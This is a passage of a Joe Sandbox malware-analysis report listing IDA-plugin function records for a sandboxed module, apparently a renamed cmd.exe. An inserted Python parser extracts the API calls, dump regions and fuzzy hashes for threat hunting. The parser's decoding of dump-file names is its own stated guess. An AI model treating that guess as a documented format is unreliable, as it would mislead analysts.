                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C13435A042119BCF28EF7C888567E77B5BF59314F28812EE916D7281EB74CD81CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00198060
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 001981BE
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 0019818C
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00198197
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001,-00000001,00000000,?,00000000), ref: 001AB09E
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 001AB0AB
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 001AB0C1
                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 001AB0D5
                                                                                                                                                                                                                          • fflush.MSVCRT ref: 001AB0E3
                                                                                                                                                                                                                            • Part of subcall function 00198F21: _wcsicmp.MSVCRT ref: 00198FCD
                                                                                                                                                                                                                            • Part of subcall function 00198F21: _wcsicmp.MSVCRT ref: 00198FE3
                                                                                                                                                                                                                            • Part of subcall function 00198F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00199002
                                                                                                                                                                                                                            • Part of subcall function 00198F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00199013
                                                                                                                                                                                                                            • Part of subcall function 00198E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001D8BF0,00000000,?), ref: 00198EC3
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D3A
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D44
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D57
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D61
                                                                                                                                                                                                                            • Part of subcall function 001A01F5: wcsrchr.MSVCRT ref: 001A01FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3753564779-0
                                                                                                                                                                                                                          • Opcode ID: e901226ef35ed84a627c53c5422db7f333a88e2bfacaacc293217921ea0f5f5c
                                                                                                                                                                                                                          • Instruction ID: 5650cb053a4124f6e3df39241e4757b6efaa84f806baf1efbc0c81ab8b3abfd4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e901226ef35ed84a627c53c5422db7f333a88e2bfacaacc293217921ea0f5f5c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F51DE30A01211AFCF24EBB49C96ABF77B5EF19710F14042AF906D7691EB70C981CB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B8B7B
                                                                                                                                                                                                                          • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001B9323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 001B8B83
                                                                                                                                                                                                                            • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B8BB5
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B8BBD
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B8BCF
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B8BD7
                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,?), ref: 001B8BED
                                                                                                                                                                                                                            • Part of subcall function 001A654B: _wcsicmp.MSVCRT ref: 001A65A4
                                                                                                                                                                                                                            • Part of subcall function 001A654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 001A65D7
                                                                                                                                                                                                                            • Part of subcall function 001A654B: _open_osfhandle.MSVCRT ref: 001A65EB
                                                                                                                                                                                                                            • Part of subcall function 001A654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 001B2092
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B8C1A
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B8C22
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
• String ID:
• API String ID: 4208585293-0
• Opcode ID: 7c20f781a55e9849ae4142fdb2a131a3542540d313720ec3093b2b49b16607b8
• Instruction ID: 4421023117e93d8a2cdeae142104e74c2cc05d5842b20b0fadb60079e6a30edd
• Opcode Fuzzy Hash: 7c20f781a55e9849ae4142fdb2a131a3542540d313720ec3093b2b49b16607b8
• Instruction Fuzzy Hash: 5F21D1B1601204AFEB28AF30DC4EEBB7B6DEF94760F644629F156C21E1EB718C41C621
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset
• String ID: %s
• API String ID: 2221118986-3043279178
• Opcode ID: 4ccb49619dad773d99fbc0c743889dd21308809ca8b9783ac2be56a1804e8fab
• Instruction ID: 55cae7af97e2a4f6efdb2c5f8360cb680b06df4d5ff69d3b297c9b888e552e7f
• Opcode Fuzzy Hash: 4ccb49619dad773d99fbc0c743889dd21308809ca8b9783ac2be56a1804e8fab
• Instruction Fuzzy Hash: FA919E796093419FDB34DE50C885BABB3E4BF96304F00092DF999C7190EB38EA45CB52
APIs
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• _wcsnicmp.MSVCRT ref: 0019C1B7
• wcstol.MSVCRT ref: 0019C1FC
• wcstol.MSVCRT ref: 0019C28A
• longjmp.MSVCRT(?,000000FF), ref: 001ACFB0
• longjmp.MSVCRT(?,000000FF), ref: 001ACFC4
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
• String ID:
• API String ID: 2863075230-0
• Opcode ID: df4fc24d9bcab18b54db186df397b010b7522515f8461c39821b94d033b725b2
• Instruction ID: 9fca8c9f485e2c1cd33ea098d677f3ff8a3f9211ea30459977edfbaf04ff0344
• Opcode Fuzzy Hash: df4fc24d9bcab18b54db186df397b010b7522515f8461c39821b94d033b725b2
• Instruction Fuzzy Hash: 8AF1A279D00215CBCF28CF98C9916BEB7B1BF98700F59821AE856A7784E7716E41CBD0
APIs
• memset.MSVCRT ref: 001A2795
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• memset.MSVCRT ref: 001A280E
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 001A281D
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 001A2857
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 001A290B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$EnvironmentVariable
• String ID: DIRCMD
• API String ID: 1405722092-1465291664
• Opcode ID: 3bdf40ec09740c5087d0da0ee05dc4c321454db2055812c985df1dbb8fd338d4
• Instruction ID: 5993fd9c6b13e8a4212f8f292ea694368f5b3630790b642d21cc2faca63ea696
• Opcode Fuzzy Hash: 3bdf40ec09740c5087d0da0ee05dc4c321454db2055812c985df1dbb8fd338d4
• Instruction Fuzzy Hash: 467135B5A0D3819FD768DF29C884A9BBBE4BF9A300F10492EF59983250DB348904CB57
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: wcschr$iswdigit
• String ID: +-~!$<>+-*/%()|^&=,
• API String ID: 2770779731-632268628
• Opcode ID: 0820db80eb04736603c25562e2ab31ac06b432645a7b2af31c5f34dadcb5d93b
• Instruction ID: 2efc31c66d61f509d2043afa3dac8e034f5ce7eb119f78c0bb9bfb55e8e31e78
• Opcode Fuzzy Hash: 0820db80eb04736603c25562e2ab31ac06b432645a7b2af31c5f34dadcb5d93b
• Instruction Fuzzy Hash: 77119E3A205212AFE7259F6AE844B7677E9FF9B761320002FF890C7650EB21DC408660
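The entries above are the Joe Sandbox IDA plugin's per-function records for the module at 0x190000 in process 13: the APIs list (lines marked "Part of subcall function" are calls the plugin attributes to a callee it inlined), the memory-dump file names, the snapshot file, and the similarity IDs and fuzzy hashes used to match a function across reports. The Python below is an added example, not Joe Sandbox's own code, that parses such records into structured fields so an analyst can pivot on the hashes, list the environment variables a function reads (the DIRCMD lookup above is the variable cmd.exe's dir command consults for default switches, which is how a renamed copy of cmd.exe betrays itself in a dump), and cross-check the snapshot name against the dump name. The sample input is the DIRCMD entry copied from this page; the decoding of the dump-name fields (fifth field as page protection, seventh as MEM_IMAGE) and of the hcaresult_<pid>_<run>_<base> snapshot name is an inference from the values on this page, not a documented format, and is labelled as such in the code.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import Dict, List, Optional
# Constructed input: the DIRCMD entry copied from the listing above, with the page's
# "Download File" link text left glued to one file name to show it being stripped.
SAMPLE = """\
APIs
• memset.MSVCRT ref: 001A2795
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 001A281D
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 001A290B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$EnvironmentVariable
• String ID: DIRCMD
• Instruction Fuzzy Hash: 467135B5A0D3819FD768DF29C884A9BBBE4BF9A300F10492EF59983250DB348904CB57
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# Win32 protection constants. Reading the fifth dump-name field as page protection and the
# seventh as MEM_IMAGE is an assumption; it fits every dump on the page (0x02 header, 0x20 code, 0x04 data).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_IMAGE = 0x01000000
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]+)\.([0-9A-F]{16})"
                     r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-F]{8}): )?"
                    r"([^.(]+)\.([\w.\-]+)(?:\(([^)]*)\))?,? ref: ([0-9A-F]{8})$")
SNAPSHOT_RE = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_")  # assumed convention
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")  # subcall_of: inlined callee

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    regions: List[Dict] = field(default_factory=list)  # decoded dump names, Source File first
    module_base: Optional[int] = None
    snapshot: str = ""
    similarity: Dict[str, str] = field(default_factory=dict)

def decode_sdmp_name(name: str) -> Dict:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    proc, run, _dump_id, base, prot, _f6, mem_type, _mod_idx = m.groups()
    p = int(prot, 16)
    return {"process": int(proc, 16), "run": int(run, 16), "base": int(base, 16),
            "protect": PAGE_PROTECT.get(p, f"0x{p:x}"), "is_image": int(mem_type, 16) == MEM_IMAGE}

def parse_listing(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("Download File"):   # link text the page glued onto the file name
            line = line[:-len("Download File")]
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":               # every function entry opens with its APIs section
                cur = FunctionEntry()
                entries.append(cur)
            section = line
            continue
        if cur is None:
            continue
        body = line.lstrip("• ").strip()
        key, _, val = (s.strip() for s in body.partition(":"))
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                sub, name, mod, args, ref = m.groups()
                cur.apis.append(ApiCall(name, mod, args or "", int(ref, 16),
                                        int(sub, 16) if sub else None))
        elif section == "Memory Dump Source":
            cur.regions.append(decode_sdmp_name(val.split(",", 1)[0].strip()))
            off = re.search(r"Offset: ([0-9A-F]+)", val)
            if key == "Source File" and off:
                cur.module_base = int(off.group(1), 16)
        elif section == "Joe Sandbox IDA Plugin" and key == "Snapshot File":
            cur.snapshot = val
        elif section == "Similarity":
            cur.similarity[key] = val
    return entries

def env_vars_read(entry: FunctionEntry) -> List[str]:
    """First argument of each GetEnvironmentVariableW call; DIRCMD is read only by cmd.exe's dir."""
    return sorted({c.args.split(",")[0] for c in entry.apis
                   if c.name == "GetEnvironmentVariableW" and c.args})

def snapshot_matches_dump(entry: FunctionEntry) -> bool:
    """hcaresult_<pid>_<run>_<base> (assumed layout) must agree with the Source File dump fields."""
    m = SNAPSHOT_RE.search(entry.snapshot)
    return bool(m and entry.regions and (int(m[1]), int(m[2]), int(m[3], 16)) ==
                (entry.regions[0]["process"], entry.regions[0]["run"], entry.module_base))
```

Run over the sample, the decoded regions line up with the PE layout the report claims ("based on PE: true"): 0x190000 read-only for the headers, 0x191000 execute-read for the code every ref on this page falls into, 0x1BE000 read-write for data, which is what a mapped image looks like as opposed to an injected RWX blob. The Instruction Fuzzy Hash and Opcode ID fields are the values to carry into other reports when hunting for the same function body under a different sample.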
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00199A11: _get_osfhandle.MSVCRT ref: 00199A1C
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0019793A,00000104,?), ref: 00199A2B
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A47
                                                                                                                                                                                                                            • Part of subcall function 00199A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A56
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A61
                                                                                                                                                                                                                            • Part of subcall function 00199A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A6A
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001A86E3
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A86EB
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 001A872A
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001A8743
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A874B
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: _get_osfhandle.MSVCRT ref: 00199B4E
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001D0AF0,000000FF,001CA7F0,00002000,00000000,00000000), ref: 00199B8E
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F0,-00000001,?,00000000), ref: 00199BA3
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001), ref: 001A87CE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1333215474-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 001961E4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3458554142-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                          • String ID: ELSE$IF/?
                                                                                                                                                                                                                          • API String ID: 2081463915-1134991328
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A643A: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 001A6454
                                                                                                                                                                                                                            • Part of subcall function 001A643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 001A646C
                                                                                                                                                                                                                            • Part of subcall function 001A643A: NtClose.NTDLL ref: 001A64BD
                                                                                                                                                                                                                          • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 001A63B5
                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 001A63E3
                                                                                                                                                                                                                          • RtlNtStatusToDosError.NTDLL ref: 001B1EF4
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001B1EFB
                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 001B1F6B
                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 001B1F86
                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 001B1FA4
                                                                                                                                                                                                                            • Part of subcall function 001A640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,001B9C96,001AFDFA,00000000,?), ref: 001A642F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1313749407-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001B9AC2
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 001B9B22
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 001B9B32
                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 001B9BAD
